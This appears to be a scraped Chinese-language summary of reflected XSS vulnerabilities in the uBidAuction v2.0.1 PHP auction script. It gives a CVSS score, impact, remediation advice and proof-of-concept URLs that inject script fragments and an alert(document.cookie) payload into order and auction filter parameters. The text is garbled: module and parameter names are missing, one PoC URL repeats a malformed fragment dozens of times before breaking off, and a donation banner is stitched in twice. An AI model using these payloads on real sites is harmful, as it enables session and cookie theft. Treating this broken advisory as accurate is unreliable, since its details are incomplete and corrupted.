uBidAuction v2.0.1 多个非持久性XSS漏洞及PoC

uBidAuction v2.0.1 多个非持久性 XSS 漏洞总结 漏洞概述 漏洞名称：uBidAuction v2.0.1 - Multiple XSS Web Vulnerabilities 漏洞类型：非持久性跨站脚本 (Non-Persistent XSS) CVSS 评分：5.4 发现时间：2022-01-21 漏洞详情：在 uBidAuction v2.0.1 脚本 Web 应用程序中发现多个非持久性跨站脚本漏洞。攻击者可以通过在 模块的 、 、 和 参数中注入恶意脚本代码，利用 GET 请求从客户端浏览器发起攻击。成功利用可导致会话劫持、钓鱼攻击、外部重定向及敏感数据操纵。 影响范围 受影响产品：uBidAuction v2.0.1 - Auction Script (PHP) 受影响模块： 受影响参数： , , , , 修复方案 过滤或安全编码：对 、 、 和 参数进行过滤或安全编码。 禁用特殊字符：禁用受影响参数中特殊字符的 GET 方法请求。 输出转义：在 模块中，对漏洞输出位置进行转义。 概念验证 (POC) 代码 1. 成员角色 (Member) POC 2. 管理员角色 (Admin) POC** ```html https://bid-auction.localhost:8080/orders/myorders?order_number=1&created_at=%22%3E%3Ciframe%3E%3C/script%3EDevil.source=onload%20alert(document.cookie)%29%3E&status=4&but_filter=filter https://bid-auction.localhost:8080/auctions/myauctions/status/active?auction_number=1&name=oldate_from=%22%3E%3Ciframe%3E%3C/script%3EDevil.source=onload&date_to=&auction_number=1&name=oldate_from=%22%3E%3Ciframe%3E%3C/script%3EDevil.source=onload&date_to=&auction_number=1&name=oldate_from=%22%3E%3Ciframe%3E%3C/script%3EDevil.source=onload&date_to=&auction_number=1&name=oldate_from=%22%3E%3Ciframe%3E%3C/script%3EDevil.source=onload&date_to=&auction_number=1&name=oldate_from=%22%3E%3Ciframe%3E%3C/script%3EDevil.source=onload&date_to=&auction_number=1&name=oldate_from=%22%3E%3Ciframe%3E%3C/script%3EDevil.source=onload&date_to=&auction_number=1&name=oldate_from=%22%3E%3Ciframe%3E%3C/script%3EDevil.source=onload&date_to=&auction_number=1&name=oldate_from=%22%3E%3Ciframe%3E%3C/script%3EDevil.source=onload&date_to=&auction_number=1&name=oldate_from=%22%3E%3Ciframe%3E%3C/script%3EDevil.source=onload&date_to=&auction_number=1&name=oldate_from=%22%3E%3Ciframe%3E%3C/script%3EDevil.source=onload&date_to=&auction_number=1&name=oldate_from=%22%3E%3Ciframe%3E%3C/script%3EDevil.source=onload&date_to=&auction_number=1&name=oldate_from=%22%3E%3Ciframe%3E%3C/script%3EDevil.source=onload&date_to=&auction_number=1&name=oldate_from=%22%3E%3Ciframe%3E%3C/script%3EDevil.source=onload&date_to=&auction_number=1&name=oldate_from=%22%3E%3Ciframe%3E%3C/script%3EDevil.source=onload&date_to=&auction_number=1&name=oldate_from=%22%3E%3Ciframe%3E%3C/script%3EDevil.source=onload&date_to=&auction_number=1&name=oldate_from=%22%3E%3Ciframe%3E%3C/script%3EDevil.source=onload&date_to=&auction_number=1&name=oldate_from=%22%3E%3Ciframe%3E%3C/script%3EDevil.source=onload&date_to=&auction_number=1&name=oldate_from=%22%3E%3Ciframe%3E%3C/script%3EDevil.source=onload&date_to=&auction_number=1&name=oldate_from=%22%3E%3Ciframe%3E%3C/script%3EDevil.source=onload&date_to=&auction_number=1&name=oldate_from=%22%3E%3Ciframe%3E%3C/script%3EDevil.source=onload&date_to=&auction_number=1&name=oldate_from=%22%3E%3Ciframe%3E%3C/script%3EDevil.source=onload&date_to=&auction_number=1&name=oldate_from=%22%3E%3Ciframe%3E%3C/script%3EDevil.source=onload&date_to=&auction_number=1&name=oldate_from=%22%3E%3Ciframe%3E%3C/script%3EDevil.source=onload&date_to=&auction_number=1&name=oldate_from=%22%3E%3Ciframe%3E%3C/script%3EDevil.source=onload&date_to=&auction_number=1&name=oldate_from=%22%3E%3Ciframe%3E%3C/script%3EDevil.source=onload&date_to=&auction_number=1&name=oldate_from=%22%3E%3Ciframe%3E%3C/script%3EDevil.source=onload&date_to=&auction_number=1&name=oldate_from=%22%3E%3Ciframe%3E%3C/script%3EDevil.source=onload&date_to=&auction_number=1&name=oldate_from=%22%3E%3Ciframe%3E%3C/script%3EDevil.source=onload&date_to=&auction_number=1&name=oldate_from=%22%3E%3Ciframe%3E%3C/script%3EDevil.source=onload&date_to=&auction_number=1&name=oldate_from=%22%3E%3Ciframe%3E%3C/script%3EDevil.source=onload&date_to=&auction_number=1&name=oldate_from=%22%3E%3Ciframe%3E%3C/script%3EDevil.source=onload&date_to=&auction_number=1&name=oldate_from=%22%3E%3Ciframe%3E%3C/script%3EDevil.source=onload&date_to=&auction_number=1&name=oldate_from=%22%3E%3Ciframe%3E%3C/script%3EDevil.source=onload&date_to=&auction_number=1&name=oldate_from=%22%3E%3Ciframe%3E%3C/script%3EDevil.source=onload&date_to=&auction_number=1&name=oldate_from=%22%3E%3Ciframe%3E%3C/script%3EDevil.source=onload&date_to=&auction_number=1&name=oldate_from=%22%3E%3Ciframe%3E%3C/script%3EDevil.source=onload&date_to=&auction_number=1&name=oldate_from=%22%3E%3Ciframe%3E%3C/script%3EDevil.source=onload&date_to=&auction_number=1&name=oldate_from=%22%3E%3Ciframe%3E%3C/script%3EDevil.source=onload&date_to=&auction_number=1&name=oldate_from=%22%3E%3Ciframe%3E%3C/script%3EDevil.source=onload&date_to=&auction_number=1&name=oldate_from=%22%3E%3Ciframe%3E%3C/script%3EDevil.source=onload&date_to=&auction_number=1&name=oldate_from=%22%3E%3Ciframe%3E%3C/script%3EDevil.source=onload&date_to=&auction_number=1&name=oldate_from=%22%3E%3Ciframe%3E%3C/script%3EDevil.source=onload&date_to=&auction_number=1&name=oldate_from=%22%3E%3Ciframe%3E%3C/script%3EDevil.source=onload&date_to=&auction_number=1&name=oldate_from=%22%3E%3Ciframe%3E%3C/script%3EDevil.source=onload&date_to=&auction_number=1&name=oldate_from=%22%3E%3Ciframe%3E%3C/script%3EDevil.source=onl

目标达成 感谢每一位支持者 — 我们达成了 100% 目标！

uBidAuction v2.0.1 多个非持久性XSS漏洞及PoC

目标达成感谢每一位支持者 — 我们达成了 100% 目标！